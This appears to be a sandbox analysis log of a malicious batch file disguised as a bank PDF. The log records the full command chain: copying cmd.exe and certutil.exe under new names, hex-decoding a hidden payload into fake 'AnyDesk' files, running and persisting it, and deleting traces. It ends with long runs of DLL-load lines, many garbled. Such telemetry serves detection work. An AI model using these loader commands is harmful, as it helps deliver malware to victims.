              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hgkvgoaF.cmd" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Faogvkgh.PIF /o
              Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: unknownProcess created: C:\Users\Public\Libraries\Faogvkgh.PIF "C:\Users\Public\Libraries\Faogvkgh.PIF"
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: unknownProcess created: C:\Users\Public\Libraries\Faogvkgh.PIF "C:\Users\Public\Libraries\Faogvkgh.PIF"
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hgkvgoaF.cmd" "Jump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Faogvkgh.PIF /oJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: url.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: userenv.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???????.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
